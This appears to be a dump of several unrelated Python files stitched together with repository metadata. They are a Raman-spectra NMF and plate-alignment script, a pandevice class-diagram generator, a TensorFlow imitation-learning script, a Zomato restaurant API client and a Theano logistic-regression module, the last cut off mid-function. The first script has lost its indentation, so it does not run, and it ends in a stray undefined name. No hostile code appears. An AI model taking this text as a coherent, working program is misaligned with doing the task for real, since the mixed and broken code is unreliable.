platemapvisprocesspath=os.path.join(pythoncodepath, 'JCAPPlatemapVisualize')
sys.path.append(platemapvisprocesspath)
from plate_image_align_Dialog import plateimagealignDialog
import numpy as np
pathd={'ramanfile':r'K:\users\hte\Raman\33444\HSS_33444_map-1-_CRR-EM-copy.txt'}
pathd['mainfolder']=os.path.split(pathd['ramanfile'])[0]
pathd['savefolder']=os.path.join(pathd['mainfolder'], '20170518analysis')
pathd['infopck']=pathd['ramanfile'][:-4]+'__info.pck'
pathd['allspectra']=os.path.join(pathd['savefolder'],'allspectra.npy')
pathd['nmfdata']=os.path.join(pathd['savefolder'],'nmf4.pck')
pathd['edges']=os.path.join(pathd['savefolder'],'edges.png')
pathd['mapfill']=os.path.join(pathd['savefolder'],'blobmap.png')
pathd['blobd']=os.path.join(pathd['savefolder'],'blobd.pck')
pathd['alignedsamples']=os.path.join(pathd['savefolder'],'alignedsamples.png')
pathd['alignedsamplestxt']=os.path.join(pathd['savefolder'],'alignedsamples.txt')
pathd['spectrafolder']=os.path.join(pathd['savefolder'],'sample_spectra')
pathd['map']=os.path.join(pathd['spectrafolder'],'raman_sample_index_map.map')
pathd['samplepixels']=os.path.join(pathd['spectrafolder'],'samplepixels.png')
dx_smp=1.
dy_smp=1.
default_sample_blob_dict=dict({}, \
smp_is_square=0, smp_width=1., bcknd_is_square=0, bcknd_min_width=1.3, bcknd_max_width=1.4, removedups=1\
)
class MainMenu(QMainWindow):
def __init__(self, previousmm, execute=True, **kwargs):
super(MainMenu, self).__init__(None)
self.parseui=dataparseDialog(self, title='Visualize ANA, EXP, RUN data', **kwargs)
self.alignui=plateimagealignDialog(self, manual_image_init_bool=False)
if execute:
self.parseui.exec_()
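# MainMenu wires together the two dialogs used below: the Raman data parse dialog
# (self.parseui) and the plate-map image alignment dialog (self.alignui); with
# execute=False the dialogs are driven programmatically instead of shown modally.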
n_components=4
def doNMF(datan,n_components=4):
# from Mitsu
    #alternatively PCA ... might be faster
nmf=NMF(n_components=n_components,init='nndsvd')
data_decomp_all=nmf.fit_transform(datan)
data_components_all=nmf.components_
return data_decomp_all,data_components_all
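# Hedged usage sketch (assumed workflow, not executed here): the decomposition is run
# once on the full (n_spectra x n_wavenumbers) array and cached for reuse, roughly
#   data_decomp_all, data_components_all = doNMF(fullramandataarray, n_components=n_components)
#   with open(pathd['nmfdata'], mode='wb') as f:
#       pickle.dump({'data_decomp_all': data_decomp_all, 'data_components_all': data_components_all,
#                    'rgbimagedata': imGen(data_decomp_all, ramaninfod)}, f)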
def rgb_comp(arr2d, affine=True):
    #convert an (n, 4) array of CMYK weights (columns in [0, 1]) to (n, 3) RGB values
cmy_cmyk=lambda a:a[:3]*(1.-a[3])+a[3]
rgb_cmy=lambda a:1.-a
rgb_cmyk=lambda a:rgb_cmy(cmy_cmyk(a))
return numpy.array([rgb_cmyk(a) for a in arr2d])
def imGen(data_decomp_all,ramaninfod,cmykindeces=[3, 2, 1, 0]):
    #map the four NMF component weights onto CMYK channels (normalized per component)
    #and render them as an RGB image with the spatial shape of the Raman map
cmykvals=copy.copy(data_decomp_all[:, cmykindeces])
cmykvals/=cmykvals.max(axis=0)[numpy.newaxis, :]
img=numpy.reshape(rgb_comp(cmykvals), (ramaninfod['xshape'], ramaninfod['yshape'], 3))
return img
def findEdges(img_gray):
#this uses automatic thresholding from one of the cv2 tutorials
sigma = 0.33
v = np.median(img_gray)
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edges = cv2.Canny(np.uint8(img_gray),lower,upper)
return edges
def findContours(edges):
#the contours are now found by searching the most external convex hull
    #this way most of the not fully closed samples are detected as well
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
iWithContour = cv2.drawContours(edges, contours, -1, (255,20,100), 5)
mapimage = np.zeros_like(edges)
#this fills the contours
for i in range(len(contours)):
cv2.drawContours(mapimage, contours, i, color=255, thickness=-1)
#this is to calculate the center of each contour
x=[]
y=[]
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
try:
x.append(M['m10']/(M['m00']))
y.append(M['m01']/(M['m00']))
except:
            #this was necessary as the divisor is sometimes 0
            #yields good results but should be done with caution
x.append(M['m10']/(M['m00']+1e-23))
y.append(M['m01']/(M['m00']+1e-23))
return iWithContour, mapimage, contours, x, y
mainapp=QApplication(sys.argv)
form=MainMenu(None, execute=False)
#form.show()
#form.setFocus()
#mainapp.exec_()
parseui=form.parseui
alignui=form.alignui
parseui.rawpathLineEdit.setText(pathd['ramanfile'])
parseui.infopathLineEdit.setText(pathd['infopck'])
parseui.getinfo(ramaninfop=pathd['infopck'], ramanfp=pathd['ramanfile'])#opens or creates
if os.path.isfile(pathd['allspectra']):
with open(pathd['allspectra'], mode='rb') as f:
fullramandataarray=numpy.load(f)
elif 0:
fullramandataarray=parseui.readfullramanarray(pathd['ramanfile'])#opens or creates
with open(pathd['allspectra'], mode='wb') as f:
numpy.save(f, fullramandataarray)
ramaninfod=parseui.ramaninfod
#ramaninfod['number of spectra']
#ramaninfod['xdata']
#ramaninfod['ydata']
#ramaninfod['Wavenumbers_str']
#ramaninfod['Spectrum 0 index']
ramaninfod['xdata']/=1000.
ramaninfod['ydata']/=1000.#convert to mm
ramaninfod['xshape']= len(np.unique(ramaninfod['xdata']))
ramaninfod['yshape']= len(np.unique(ramaninfod['ydata']))
ramaninfod['dx']= (ramaninfod['xdata'].max()-ramaninfod['xdata'].min())/(ramaninfod['xshape']-1)
ramaninfod['dy']= (ramaninfod['ydata'].max()-ramaninfod['ydata'].min())/(ramaninfod['yshape']-1)
nx=dx_smp/ramaninfod['dx']
ny=dy_smp/ramaninfod['dy']
ntot=nx*ny
ramanreshape=lambda arr: np.reshape(arr, (ramaninfod['xshape'], ramaninfod['yshape'])).T[::-1, ::-1]
ramannewshape=(ramaninfod['yshape'], ramaninfod['xshape'])
image_of_x=ramanreshape(ramaninfod['xdata'])
image_of_y=ramanreshape(ramaninfod['ydata'])
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].min(), ramaninfod['ydata'].max()]
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].max(), ramaninfod['ydata'].min()]
extent=[image_of_x[0, 0], image_of_x[-1, -1], image_of_y[0, 0], image_of_y[-1, -1]]
def ramanimshow(im, **kwargs):
plt.imshow(im, origin='lower', interpolation='none', aspect=1, extent=extent, **kwargs)
if os.path.isfile(pathd['nmfdata']):
with open(pathd['nmfdata'], mode='rb') as f:
tempd=pickle.load(f)
data_decomp_all,data_components_all,rgbimagedata=[tempd[k] for k in 'data_decomp_all,data_components_all,rgbimagedata'.split(',')]
elif 1:
with open(os.path.join(pathd['savefolder'],'data_decomp_all_protocol2.pck'), mode='rb') as f:
data_decomp_all=pickle.load(f)
with open(os.path.join(pathd['savefolder'],'data_components_all_protocol2.pck'), mode='rb') as f:
data_components_all=pickle.load(f)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
else:
    data_decomp_all,data_components_all = doNMF(fullramandataarray,4)  # assumed input: the full spectra array loaded above ('datan' was undefined here)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
    tempd=dict(zip('data_decomp_all,data_components_all,rgbimagedata'.split(','), (data_decomp_all, data_components_all, rgbimagedata)))
    with open(pathd['nmfdata'], mode='wb') as f:
        pickle.dump(tempd, f)
if 1 and os.path.isfile(pathd['blobd']):
with open(pathd['blobd'], mode='rb') as f:
blobd=pickle.load(f)
else:
edges = np.zeros(ramannewshape, dtype='uint8')
plt.clf()
for i in range(n_components):
arr=np.uint8(ramanreshape(data_decomp_all[:,i])/data_decomp_all[:,i].max()*254)
edgetemp=findEdges(arr)
# plt.imshow(edgetemp)
# plt.show()
edges[np.where(edgetemp>0)] = 244
ramanimshow(edges)
plt.savefig(pathd['edges'])
plt.clf()
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
image_of_inds=ramanreshape(numpy.arange(ramaninfod['number of spectra']))
mapfill = np.zeros(ramannewshape, dtype='uint8')
blobd={}
l_mask=[cv2.drawContours(np.zeros(ramannewshape, dtype='uint8'), contours, i, color=1, thickness=-1) for i in range(len(contours))]
l_imageinds=[numpy.where(mask==1) for mask in l_mask]
l_xycen=np.array([[image_of_x[imageinds].mean(), image_of_y[imageinds].mean()] for imageinds in l_imageinds])
indstomerge=sorted([(count2+count+1, count) for count, xy0 in enumerate(l_xycen) for count2, xy1 in enumerate(l_xycen[count+1:]) if ((xy0-xy1)**2).sum()<(dx_smp**2+dy_smp**2)/10.])[::-1]
#indstomerge has highest index first so merge going down
for indhigh, indlow in indstomerge:
imageinds=l_imageinds.pop(indhigh)
mask=l_mask.pop(indhigh)
l_mask[indlow][imageinds]=1#update only the masks and then update everythign else afterwards
l_imageinds=[numpy.where(mask==1) for mask in l_mask]
l_xycen=np.array([[image_of_x[imageinds].mean(), image_of_y[imageinds].mean()] for imageinds in l_imageinds])
for imageinds, mask in zip(l_imageinds, l_mask):
indsinblob=sorted(list(image_of_inds[imageinds]))
relx=(image_of_x[imageinds].max()-image_of_x[imageinds].min())/dx_smp
rely=(image_of_y[imageinds].max()-image_of_y[imageinds].min())/dy_smp
if relx<0.5 or relx>1.4 or rely<0.5 or rely>1.4 or len(indsinblob)<ntot*0.5 or len(indsinblob)>ntot*1.5:
print 'skipped blob that was %.2f, %.2f of expected size with %d pixels' %(relx, rely, len(indsinblob))
continue
if numpy.any(mapfill[imageinds]==1):
print 'overlapping blobs detected'
xc=image_of_x[imageinds].mean()
yc=image_of_y[imageinds].mean()
mapfill[imageinds]=1
blobd[(xc, yc)]=indsinblob
plt.clf()
ramanimshow(mapfill)
plt.savefig(pathd['mapfill'])
plt.show()
with open(pathd['blobd'], mode='wb') as f:
pickle.dump(blobd, f)
alignui.knownblobsdict=blobd
alignui.openAddFile(p=r'J:\hte_jcap_app_proto\map\0084-04-0100-mp.txt')
alignui.image=rgbimagedata
alignui.motimage_extent=extent #left,right,bottom,top in mm
alignui.reloadimagewithextent()
#alignui.plotw_motimage.axes.imshow(alignui.image, origin='lower', interpolation='none', aspect=1, extent=alignui.motimage_extent)
xarr, yarr=np.array(blobd.keys()).T
alignui.plotw_motimage.axes.plot(xarr, yarr, 'wx', ms=4)
alignui.plotw_motimage.fig.canvas.draw()
alignui.exec_()
alignui.sampleLineEdit.setText('1850,1851,1852,1853,1854,1855,1905,1906,1907,1908,1909,1910,1911,1912,1913,1914,1915,1916,1917,1918,1919,1969,1970,1971,1972,1973,1974,1975,1976,1977,1978,1979,1980,1981,1982,1983,2033,2034,2035,2036,2037,2038,2039,2040,2041,2042,2043,2044,2045,2046,2047,2097,2098,2099,2100,2101,2102,2103,2104,2105,2106,2107,2108,2109,2110,2111')
alignui.addValuesSample()
alignui.exec_()
alignui.plotw_motimage.fig.savefig(pathd['alignedsamples'])
with open(pathd['alignedsamplestxt'], mode='w') as f:
f.write(str(alignui.browser.toPlainText()))
alignui.openpckinfo(p=pathd['infopck'])
alignui.infox/=1000.
alignui.infoy/=1000.
alignui.perform_genmapfile(p=pathd['map'], **default_sample_blob_dict)
mapfill2=np.zeros(ramaninfod['number of spectra'], dtype='uint8')
for smp, inds in alignui.smp_inds_list__map:
mapfill2[inds]=2 if smp>0 else 1
mapfill2=ramanreshape(mapfill2)
plt.clf()
ramanimshow(mapfill2, vmin=0, vmax=2, cmap='gnuplot')
plt.savefig(pathd['samplepixels'])
plt.show()
parseui.savepathLineEdit.setText(pathd['spectrafolder'])
parseui.match(copypath=pathd['map'])
parseui.extract()
parseui.saveave()
#parseui.readresultsfolder()
parseui.exec_()
errorattheend
| bsd-3-clause | 5,611,586,650,156,254,000 | 39.10596 | 363 | 0.693692 | false |
PaloAltoNetworks-BD/SplunkforPaloAltoNetworks | Splunk_TA_paloalto/bin/lib/pandevice/docs/configtree.py | 2 | 5431 | #!/usr/bin/env python
# Copyright (c) 2016, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Author: Brian Torres-Gil <[email protected]>
"""Generate class diagram from module and class source code"""
import os
import sys
import pkgutil
import inspect
import errno
header = """digraph configtree {
graph [rankdir=LR, fontsize=10, margin=0.001];
node [shape=box, fontsize=10, height=0.001, margin=0.1, ordering=out];"""
footer = "}\n"
nodestyle = {
# 'Firewall': '',
# 'Panorama': '',
'device': 'fillcolor=lightpink',
'firewall': 'fillcolor=lightblue',
'ha': 'fillcolor=lavender',
'network': 'fillcolor=lightcyan',
'objects': 'fillcolor=lemonchiffon',
'policies': 'fillcolor=lightsalmon',
'panorama': 'fillcolor=darkseagreen2',
}
def mkdir_p(path):
"""Make a full directory path"""
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def node_style(cls):
cls = str(cls)
style = ""
if "." in cls:
module = cls.split(".")[0]
cls_name = cls.split(".")[-1]
try:
style = "style=filled " + nodestyle[cls_name] + " "
except KeyError:
try:
style = "style=filled " + nodestyle[module] + " "
except:
pass
result = " {0} [{1}URL=\"../module-{2}.html#pandevice.{3}\" target=\"_top\"];\n".format(
cls_name, style, module, cls
)
else:
if style:
result = " {0} [{1}]\n".format(style)
else:
result = ""
return result
def legend(modules):
result = []
result.append("graph configtree {\n")
result.append(" graph [fontsize=10, margin=0.001];\n")
result.append(" node [shape=box, fontsize=10, height=0.001, margin=0.1, ordering=out];\n")
for module in modules:
module_name = module.__name__.split(".")[-1]
try:
result.append(" {0} [style=filled {1}]\n".format(module_name, nodestyle[module_name]))
except KeyError:
pass
#result.append(" PanDevice [style=filled]\n")
result.append("}\n")
return result
def create_object_diagram(directory=None):
# Set paths to package and modules
curdir = os.path.dirname(os.path.abspath(__file__))
rootpath = [os.path.join(curdir, os.pardir)]
libpath = [os.path.join(curdir, os.pardir, 'pandevice')]
sys.path[:0] = rootpath
sys.path[:0] = libpath
#print "Looking for pandevice in path: %s" % libpath
# Import all modules in package
modules = []
for importer, modname, ispkg in pkgutil.iter_modules(path=libpath,
prefix="pandevice."):
modules.append(__import__(modname, fromlist="dummy"))
output = {}
output["legend"] = legend(modules)
# Gather a list of all classes in all modules
for module in modules:
module_name = module.__name__
output[module_name] = []
classes_seen = []
for class_name, cls in inspect.getmembers(module, inspect.isclass):
if hasattr(cls, "CHILDTYPES") and getattr(cls, "CHILDTYPES"):
full_class_name = "{0}.{1}".format(module_name.split(".")[-1], class_name)
if full_class_name not in classes_seen:
classes_seen.append(full_class_name)
output[module_name].append(node_style(full_class_name))
children = list(getattr(cls, "CHILDTYPES"))
children.sort()
for child in children:
child_module = child.split(".")[0]
child_name = child.split(".")[-1]
#if child_name == "IPv6Address":
#continue
if child not in classes_seen:
classes_seen.append(child)
output[module_name].append(node_style(child))
output[module_name].append(" {0} -> {1};\n".format(class_name, child_name))
# Write output to file or stdout
path = ""
if directory is not None:
mkdir_p(directory)
path = directory + "/"
for module, lines in output.items():
if not lines:
continue
moduleout = "".join(lines)
if module == "legend":
fulloutput = moduleout
else:
fulloutput = header + moduleout + footer
with open("{0}{1}.dot".format(path, module), 'w') as file:
file.write(fulloutput)
if __name__ == "__main__":
create_object_diagram()
| isc | -6,384,867,889,624,848,000 | 32.732919 | 101 | 0.579635 | false |
pashadude/TensorflowReinforcementLearning | hw1/imitation_learning.py | 1 | 2947 | import gym
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import pickle
import tensorflow as tf
import tf_util
import argparse
import tqdm
def main():
parser = argparse.ArgumentParser()
parser.add_argument('env', type=str)
args = parser.parse_args()
inputs, outputs, evaluations = extract_imitation(args.env)
model = train_regressor(inputs, outputs)
run_regressor(evaluations, model, args.env)
def extract_imitation(env):
dic_data = pickle.loads(open('imitation/original/{}.pkl'.format(env), 'rb').read())
inputs = np.array(dic_data['observations'])
outputs = np.array(dic_data['actions'])
evaluations = pd.DataFrame({'steps': dic_data['steps'], 'expert returns': dic_data['returns']})
return inputs, outputs, evaluations
def train_regressor(inputs, outputs, layers=[64, 64], activation_function=tf.nn.tanh, batch_size=10,
epochs=1000, steps=10000):
inputs_dim = inputs.shape[1]
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=inputs_dim)]
outputs_dim = outputs.shape[2]
estimator = tf.contrib.learn.DNNRegressor(
feature_columns=feature_columns,
hidden_units=layers,
activation_fn=activation_function,
label_dimension=outputs_dim
)
input_fn = tf.contrib.learn.io.numpy_input_fn({"": inputs}, outputs[:, 0, :],
batch_size=batch_size, num_epochs=epochs)
estimator.fit(input_fn=input_fn, steps=steps)
return estimator
def run_regressor(expert_data, model, env_name, num_rollouts=20, render=False):
returns = []
observations = []
actions = []
steps_numbers = []
with tf.Session():
env = gym.make(env_name)
max_steps = env.spec.timestep_limit
tf_util.initialize()
for i in tqdm.tqdm(range(num_rollouts)):
obs = env.reset()
done = False
totalr = 0.
steps = 0
while not done:
action = model.predict(obs[None, :], as_iterable=False)
observations.append(obs)
actions.append(action)
obs, r, done, _ = env.step(action)
totalr += r
steps += 1
if render:
env.render()
if steps >= max_steps:
break
steps_numbers.append(steps)
returns.append(totalr)
model_data = {'observations': np.array(observations),
'actions': np.array(actions),
'returns': np.array(returns),
'steps': np.array(steps_numbers)}
expert_data['model returns'] = pd.Series(model_data['returns'], index=expert_data.index)
pickle.dump(model_data, open('imitation/tnn_imitation/{}.pkl'.format(env_name), 'wb+'))
return
if __name__ == '__main__':
main()
| mit | 6,587,941,237,247,342,000 | 33.267442 | 100 | 0.587377 | false |
screwgoth/JugheadBot | hotels/zomat.py | 1 | 6039 | import os
import logging
import requests
import json
class Zomat(object):
"""
Fetch data using the Zomato API
"""
def __init__(self):
logging.basicConfig(level=logging.INFO)
self.logger = logging.getLogger("Zomat")
self.userKey = os.environ.get("USER_KEY")
self.headers = {"Accept":"application/json", "user-key": self.userKey}
def getLocation(self, location):
"""
Get Zomato entity_id and entity_type
"""
entity_id = 0
entity_type = str()
self.logger.info("Looking up for location : %s", location)
search_url = "https://developers.zomato.com/api/v2.1/locations?query="+location
search_resp = requests.get(search_url,headers=self.headers)
search_resp_dict = json.loads(search_resp.text)
loc_sug_list = search_resp_dict['location_suggestions']
for loc_sug in loc_sug_list:
entity_type = loc_sug["entity_type"]
entity_id = loc_sug["entity_id"]
if entity_id and entity_type:
self.logger.info("entity_id = %d, entity_type = %s", entity_id, entity_type)
return entity_id, entity_type
def getBestRestaurants(self, entity_id, entity_type, cuisine_id = 0):
restaurant_list = []
if cuisine_id == 0:
self.logger.info("No specific cuisine")
zomato_url = "https://developers.zomato.com/api/v2.1/search?entity_id="+str(entity_id)+"&entity_type="+str(entity_type)+"&count=5&sort=rating&order=desc"
else:
self.logger.info("Finding Restaurants as per cuisines")
zomato_url = "https://developers.zomato.com/api/v2.1/search?entity_id="+str(entity_id)+"&entity_type="+str(entity_type)+"&count=5&radius=5000&cuisines="+str(cuisine_id)+"&sort=rating&order=desc"
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
restaurants = (resp_dict['restaurants'])
print ("Top 5 restaurants : ",restaurants)
for i in restaurants:
zomato_dict = {}
zomato_dict['fbcard_name'] = i['restaurant']['name']
zomato_dict['fbcard_subtitle'] = i['restaurant']['location']['address']
zomato_dict['fbcard_url'] = i['restaurant']['url']
zomato_dict['fbcard_photo'] = i['restaurant']['featured_image']
zomato_dict['button_url'] = i['restaurant']['menu_url']
zomato_dict['button_title'] = "Restaurant Menu"
restaurant_list.append(zomato_dict)
return restaurant_list
def getCityID(self, city):
"""
Get Zomato ID and other info for a City
"""
city_id = 0
zomato_url = "https://developers.zomato.com/api/v2.1/cities?q="+city
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
# Assuming there is only one entry for this City
city_id = resp_dict['location_suggestions'][0]['id']
self.logger.info("For City : %s, got city_id = %d", city, city_id)
return city_id
def getCuisineID(self, city, cuisine):
"""
Get the Zomate Cuisine ID
"""
city_id = self.getCityID(city)
if city_id != 0:
zomato_url = "https://developers.zomato.com/api/v2.1/cuisines?city_id="+str(city_id)
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
cusines = (resp_dict['cuisines'])
for zcuisine in cusines:
if cuisine.lower() == zcuisine['cuisine']['cuisine_name'].lower():
self.logger.info("For Cuisine : %s, cuisine_id = %d", cuisine, zcuisine['cuisine']['cuisine_id'])
return zcuisine['cuisine']['cuisine_id']
# Cuisine not found
self.logger.info("Cuisine, %s, not found for city %s", cuisine, city)
return 0
def getReviews(self, res_name, entity_id = 0, entity_type = ""):
"""
Get the review for the specified Restaurant
"""
self.logger.info("Restaurant review for : %s", res_name)
res_review = []
res_id = 0
if entity_id == 0 and not entity_type:
zomato_url = "https://developers.zomato.com/api/v2.1/search?q="+res_name
else:
zomato_url = "https://developers.zomato.com/api/v2.1/search?entity_id="+str(entity_id)+"&entity_type="+entity_type+"&q="+res_name
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
restaurants = (resp_dict['restaurants'])
#print ("Found restaurants : ",restaurants)
for r in restaurants:
print (r['restaurant']['name'])
# Sometimes the queries will contains results where the Restaurant
# name is part of the address. So check specifically for the name
if res_name == r['restaurant']['name']:
zomato_dict = {}
res_id = r['restaurant']['R']['res_id']
self.logger.info("For %s, Restaurant ID = %d", res_name, res_id)
zomato_dict['fbcard_name'] = r['restaurant']['name']
zomato_dict['fbcard_subtitle'] = "Votes : " + str(r['restaurant']['user_rating']['votes']) + "\n" + "Average Cost for Two : " + str(r['restaurant']['average_cost_for_two'])
zomato_dict['fbcard_url'] = r['restaurant']['url']
zomato_dict['fbcard_photo'] = r['restaurant']['featured_image']
menu_url = r['restaurant']['menu_url']
review_url = menu_url.replace("menu", "reviews", 1)
#self.logger.info("Review URL = %s", review_url)
zomato_dict['button_url'] = review_url
zomato_dict['button_title'] = "Rating: " + r['restaurant']['user_rating']['aggregate_rating'] + "/5 (" + r['restaurant']['user_rating']['rating_text'] + ")"
res_review.append(zomato_dict)
return res_review
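# Minimal usage sketch (illustrative only; assumes USER_KEY is set in the
# environment and that the location / cuisine names exist on Zomato):
#
#   z = Zomat()
#   entity_id, entity_type = z.getLocation("Bangalore")
#   cuisine_id = z.getCuisineID("Bangalore", "Chinese")
#   restaurants = z.getBestRestaurants(entity_id, entity_type, cuisine_id)
#   reviews = z.getReviews(restaurants[0]['fbcard_name'], entity_id, entity_type)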
| mit | -1,231,327,285,772,152,800 | 46.179688 | 206 | 0.580229 | false |
yifeng-li/DECRES | logistic_sgd.py | 1 | 15395 | """
A module of multilayer perceptrons modified from the Deep Learning Tutorial.
This implementation is based on Theano and stochastic gradient descent.
Copyright (c) 2008-2013, Theano Development Team All rights reserved.
Modified by Yifeng Li
CMMT, UBC, Vancouver
Sep 23, 2014
Contact: [email protected]
"""
from __future__ import division
import pickle
import time
import math
import copy
import numpy
numpy.warnings.filterwarnings('ignore') # Theano causes some warnings
import theano
import theano.tensor as T
import classification as cl
class LogisticRegression(object):
"""
Multi-class logistic regression class.
"""
def __init__(self, input, n_in, n_out):
""" Initialize the parameters of the logistic regression
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
self.W = theano.shared(value=numpy.zeros((n_in, n_out),
dtype=theano.config.floatX),
name='W', borrow=True)
# initialize the baises b as a vector of n_out 0s
self.b = theano.shared(value=numpy.zeros((n_out,),
dtype=theano.config.floatX),
name='b', borrow=True)
# compute vector of class-membership probabilities in symbolic form
self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)
# compute prediction as class whose probability is maximal in
# symbolic form
self.y_pred = T.argmax(self.p_y_given_x, axis=1) # labels
self.y_pred_prob=T.max(self.p_y_given_x,axis=1) # probabilities
# parameters of the model
self.params = [self.W, self.b]
def negative_log_likelihood(self, y):
"""Return the mean of the negative log-likelihood of the prediction
of this model under a given target distribution.
.. math::
            \ell(\theta=\{W,b\}, \mathcal{D}) =
                -\frac{1}{|\mathcal{D}|} \sum_{i=0}^{|\mathcal{D}|-1}
                \log(P(Y=y^{(i)}|x^{(i)}, W, b))
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
Note: we use the mean instead of the sum so that
the learning rate is less dependent on the batch size
"""
# y.shape[0] is (symbolically) the number of rows in y, i.e.,
# number of examples (call it n) in the minibatch
# T.arange(y.shape[0]) is a symbolic vector which will contain
# [0,1,2,... n-1] T.log(self.p_y_given_x) is a matrix of
# Log-Probabilities (call it LP) with one row per example and
# one column per class LP[T.arange(y.shape[0]),y] is a vector
# v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,
# LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is
# the mean (across minibatch examples) of the elements in v,
# i.e., the mean log-likelihood across the minibatch.
return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])
def get_predicted(self,data):
"""
Get the class labels and probabilities given data.
"""
p_y_given_x = T.nnet.softmax(T.dot(data, self.W) + self.b)
y_pred = T.argmax(p_y_given_x, axis=1)
y_pred_prob = T.max(p_y_given_x, axis=1)
return y_pred,y_pred_prob
def errors(self, y):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
"""
# check if y has same dimension of y_pred
if y.ndim != self.y_pred.ndim:
raise TypeError('y should have the same shape as self.y_pred',
                ('y', y.type, 'y_pred', self.y_pred.type))
# check if y is of the correct datatype
if y.dtype.startswith('int'):
# the T.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return T.mean(T.neq(self.y_pred, y))
else:
raise NotImplementedError()
def get_params(self):
return copy.deepcopy(self.params)
def set_params(self, given_params):
self.params=given_params
def print_params(self):
for param in self.params:
print param.get_value(borrow=True)
def save_params(self,filename):
f=open(filename,'w') # remove existing file
f.close()
f=open(filename,'a')
for param in self.params:
pickle.dump(param.get_value(borrow=True),f)
f.close()
def read_params(filename):
f=open(filename,'r')
params=pickle.load(f)
f.close()
return params
def train_model(learning_rate=0.1, n_epochs=1000,
train_set_x_org=None,train_set_y_org=None,valid_set_x_org=None,valid_set_y_org=None,
batch_size=100):
"""
Train the logistic regression model.
INPUTS:
learning_rate: float scalar, the initial learning rate.
n_epochs: int scalar, the maximal number of epochs.
train_set_x_org: numpy 2d array, each row is a training sample.
train_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of training samples.
valid_set_x_org: numpy 2d array, each row is a validation sample.
This set is to monitor the convergence of optimization.
valid_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of validation samples.
batch_size: int scalar, minibatch size.
OUTPUTS:
classifier: object of logisticRegression, the model learned, returned for testing.
training_time: float, training time in seconds.
"""
train_set_x = theano.shared(numpy.asarray(train_set_x_org,dtype=theano.config.floatX),borrow=True)
train_set_y = T.cast(theano.shared(numpy.asarray(train_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
valid_set_x = theano.shared(numpy.asarray(valid_set_x_org,dtype=theano.config.floatX),borrow=True)
valid_set_y = T.cast(theano.shared(numpy.asarray(valid_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
# compute number of minibatches for training, validation and testing
#n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
#n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
n_train_batches = int(math.ceil(train_set_x.get_value(borrow=True).shape[0] / batch_size))
n_valid_batches = int(math.ceil(valid_set_x.get_value(borrow=True).shape[0] / batch_size))
# shared variable to reduce the learning rate
learning_rate_shared=theano.shared(learning_rate,name='learn_rate_shared')
#learning_rate_init=T.scalar(name='learning_rate_init',dtype=theano.config.floatX)
#epoch_variable=T.iscalar(name='epoch_variable')
decay_rate=T.scalar(name='decay_rate',dtype=theano.config.floatX)
#compute_learn_rate=theano.function([learning_rate_init,epoch_variable,decay_rate],learning_rate_shared, \
#updates=[(learning_rate_shared,learning_rate_init*decay_rate**(epoch_variable//100))]) # thenao does not support math.pow, instead use T.pow() or a**b
reduce_learning_rate=theano.function([decay_rate],learning_rate_shared,updates=[(learning_rate_shared,learning_rate_shared*decay_rate)])
# define the model
# allocate symbolic variables for the data
